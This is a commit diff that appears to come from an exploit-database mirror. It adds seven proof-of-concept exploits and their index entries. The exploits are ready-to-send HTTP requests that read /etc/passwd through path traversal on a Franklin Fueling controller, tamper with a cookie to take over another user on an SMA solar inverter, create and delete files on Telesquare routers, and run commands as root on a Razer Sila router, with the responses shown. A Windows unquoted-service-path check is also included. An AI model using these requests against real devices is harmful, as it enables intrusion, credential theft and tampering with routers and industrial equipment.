DB: 2022-04-12

7 changes to exploits/shellcodes MiniTool Partition Wizard - Unquoted Service Path Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI) SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR) Telesquare TLR-2855KS6 - Arbitrary File Creation Telesquare TLR-2855KS6 - Arbitrary File Deletion Razer Sila - Local File Inclusion (LFI) Razer Sila - Command Injection
2022-04-12 05:01:35 +00:00 · 2022-04-12 05:01:35 +00:00 · 6457d1796d
commit 6457d1796d
parent 50cc2edafe
8 changed files with 241 additions and 0 deletions
--- a/exploits/hardware/webapps/50860.txt
+++ b/exploits/hardware/webapps/50860.txt
@ -0,0 +1,35 @@
 # Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)
 # Date: 7/4/2022
 # Exploit Author: Momen Eldawakhly (Cyber Guy)
 # Vendor Homepage: https://www.sma.de
 # Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R
 # Tested on: Linux [Firefox]
 # CVE : CVE-2021-46416
 # Proof of Concept
 ============[ Normal user request ]============
 GET / HTTP/1.1
 Host: 192.168.1.4
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 DNT: 1
 Connection: close
 Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A861%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D
 Upgrade-Insecure-Requests: 1
 ============[ Manipulated username request ]============
 GET / HTTP/1.1
 Host: 192.168.1.4
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 DNT: 1
 Connection: close
 Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A850%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D
 Upgrade-Insecure-Requests: 1
--- a/exploits/hardware/webapps/50862.txt
+++ b/exploits/hardware/webapps/50862.txt
@ -0,0 +1,22 @@
 # Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Creation
 # Date: 7/4/2022
 # Exploit Author: Momen Eldawakhly (Cyber Guy)
 # Vendor Homepage: http://www.telesquare.co.kr/
 # Version: TLR-2855KS6
 # Tested on: Linux [Firefox]
 # CVE : CVE-2021-46418
 # Proof of Concept
 PUT /cgi-bin/testing_cve.txt HTTP/1.1
 Host: 192.168.1.5
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 DNT: 1
 Connection: close
 Cookie: nonce=1642692359833588
 Upgrade-Insecure-Requests: 1
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 32
--- a/exploits/hardware/webapps/50863.txt
+++ b/exploits/hardware/webapps/50863.txt
@ -0,0 +1,23 @@
 # Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion
 # Date: 7/4/2022
 # Exploit Author: Momen Eldawakhly (Cyber Guy)
 # Vendor Homepage: http://www.telesquare.co.kr/
 # Version: TLR-2855KS6
 # Tested on: Linux [Firefox]
 # CVE : CVE-2021-46419
 # Proof of Concept
 DELETE /cgi-bin/test.cgi HTTP/1.1
 Host: 192.168.1.5
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-type: application/x-www-form-urlencoded
 Content-Length: 438
 Origin: http://192.168.1.5
 DNT: 1
 Connection: close
 Referer: http://192.168.1.5/
 Cookie: nonce=16426923592222
--- a/exploits/hardware/webapps/50864.txt
+++ b/exploits/hardware/webapps/50864.txt
@ -0,0 +1,36 @@
 # Exploit Title: Razer Sila - Local File Inclusion (LFI)
 # Google Dork: N/A
 # Date: 4/9/2022
 # Exploit Author: Kevin Randall
 # Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
 # Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
 # Version: RazerSila-2.0.441_api-2.0.418
 # Tested on: Razer Sila Router
 # CVE N/A
 # Proof of Concept
 # Request
 POST /ubus/ HTTP/1.1
 Host: 192.168.8.1
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Content-Length: 123
 Origin: https://192.168.8.1
 Referer: https://192.168.8.1/
 Te: trailers
 Connection: close
 {"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}
 # Reponse
 HTTP/1.1 200 OK
 Connection: close
 Content-Type: application/json
 Content-Length: 537
 {"jsonrpc":"2.0","id":3,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nmosquitto:x:200:200:mosquitto:\/var\/run\/mosquitto:\/bin\/false\nlldp:x:121:129:lldp:\/var\/run\/lldp:\/bin\/false\nadmin:x:1000:1000:root:\/home\/admin:\/bin\/false\nportal:x:1001:1001::\/home\/portal:\/bin\/false\n"}]}
--- a/exploits/hardware/webapps/50865.txt
+++ b/exploits/hardware/webapps/50865.txt
@ -0,0 +1,61 @@
 # Exploit Title: Razer Sila - Command Injection
 # Google Dork: N/A
 # Date: 4/9/2022
 # Exploit Author: Kevin Randall
 # Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
 # Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
 # Version: RazerSila-2.0.441_api-2.0.418
 # Tested on: Razer Sila Router
 # CVE N/A
 # Proof of Concept
 # Request
 POST /ubus/ HTTP/1.1
 Host: 192.168.8.1
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Content-Length: 117
 Origin: https://192.168.8.1
 Referer: https://192.168.8.1/
 Te: trailers
 Connection: close
 {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]}
 # Response
 HTTP/1.1 200 OK
 Connection: close
 Content-Type: application/json
 Content-Length: 85
 {"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"uid=0(root) gid=0(root)\n"}]}
 # Request
 POST /ubus/ HTTP/1.1
 Host: 192.168.8.1
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Content-Length: 117
 Origin: https://192.168.8.1
 Referer: https://192.168.8.1/
 Te: trailers
 Connection: close
 {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"ls"}]}
 # Response
 HTTP/1.1 200 OK
 Connection: close
 Content-Type: application/json
 Content-Length: 172
 {"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"bin\ndev\netc\nhome\ninit\nlib\nmnt\nno_gui\noverlay\nproc\nrom\nroot\nsbin\nservices\nsys\ntmp\nusr\nvar\nwww\n"}]}
--- a/exploits/linux/remote/50861.txt
+++ b/exploits/linux/remote/50861.txt
@ -0,0 +1,26 @@
 # Exploit Title: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)
 # Date: 7/4/2022
 # Exploit Author: Momen Eldawakhly (Cyber Guy)
 # Vendor Homepage: https://www.franklinfueling.com/
 # Version: 1.8.19.8580
 # Tested on: Linux [Firefox]
 # CVE : CVE-2021-46417
 # Proof of Concept
 ============[ HTTP Exploitation ]============
 GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1
 Host: 192.168.1.6
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 DNT: 1
 Connection: close
 Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B
 Upgrade-Insecure-Requests: 1
 ============[ URL Exploitation ]============
 http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=
--- a/exploits/windows/local/50859.txt
+++ b/exploits/windows/local/50859.txt
@ -0,0 +1,31 @@
 # Exploit Title: MiniTool Partition Wizard - Unquoted Service Path
 # Date: 07/04/2022
 # Exploit Author: Saud Alenazi
 # Vendor Homepage: https://www.minitool.com/
 # Software Link: https://www.minitool.com/download-center/
 # Version: 12.0
 # Tested: Windows 10 Pro x64 es
 # PoC :
 C:\Users\saudh>sc qc MTSchedulerService
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: MTSchedulerService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MTSchedulerService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 C:\Users\saudh>icacls "C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe"
 C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                           BUILTIN\Administrators:(I)(F)
                                                           BUILTIN\Users:(I)(RX)
 Successfully processed 1 files; Failed processing 0 files
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11476,6 +11476,7 @@ id,file,description,date,author,type,platform,port
 50837,exploits/windows/local/50837.txt,"ProtonVPN 1.26.0 - Unquoted Service Path",1970-01-01,gemreda,local,windows,
 50852,exploits/windows/local/50852.txt,"Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path",1970-01-01,"Manthan Chhabra",local,windows,
 50858,exploits/linux/local/50858.txt,"binutils 2.37 - Objdump Segmentation Fault",1970-01-01,"Marlon Petry",local,linux,
 50859,exploits/windows/local/50859.txt,"MiniTool Partition Wizard - Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18662,6 +18663,7 @@ id,file,description,date,author,type,platform,port
 50848,exploits/hardware/remote/50848.py,"Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)",1970-01-01,sharkmoos,remote,hardware,
 50856,exploits/hardware/remote/50856.py,"Kramer VIAware - Remote Code Execution (RCE) (Root)",1970-01-01,sharkmoos,remote,hardware,
 50857,exploits/multiple/remote/50857.txt,"Opmon 9.11 - Cross-site Scripting",1970-01-01,"Marlon Petry",remote,multiple,
 50861,exploits/linux/remote/50861.txt,"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44926,3 +44928,8 @@ id,file,description,date,author,type,platform,port
 50853,exploits/php/webapps/50853.txt,"minewebcms 1.15.2 - Cross-site Scripting (XSS)",1970-01-01,"Chetanya Sharma",webapps,php,
 50854,exploits/php/webapps/50854.txt,"qdPM 9.2 - Cross-site Request Forgery (CSRF)",1970-01-01,"Chetanya Sharma",webapps,php,
 50855,exploits/php/webapps/50855.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion",1970-01-01,"Devansh Bordia",webapps,php,
 50860,exploits/hardware/webapps/50860.txt,"SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)",1970-01-01,"Momen Eldawakhly",webapps,hardware,
 50862,exploits/hardware/webapps/50862.txt,"Telesquare TLR-2855KS6 - Arbitrary File Creation",1970-01-01,"Momen Eldawakhly",webapps,hardware,
 50863,exploits/hardware/webapps/50863.txt,"Telesquare TLR-2855KS6 - Arbitrary File Deletion",1970-01-01,"Momen Eldawakhly",webapps,hardware,
 50864,exploits/hardware/webapps/50864.txt,"Razer Sila - Local File Inclusion (LFI)",1970-01-01,"Kevin Randall",webapps,hardware,
 50865,exploits/hardware/webapps/50865.txt,"Razer Sila - Command Injection",1970-01-01,"Kevin Randall",webapps,hardware,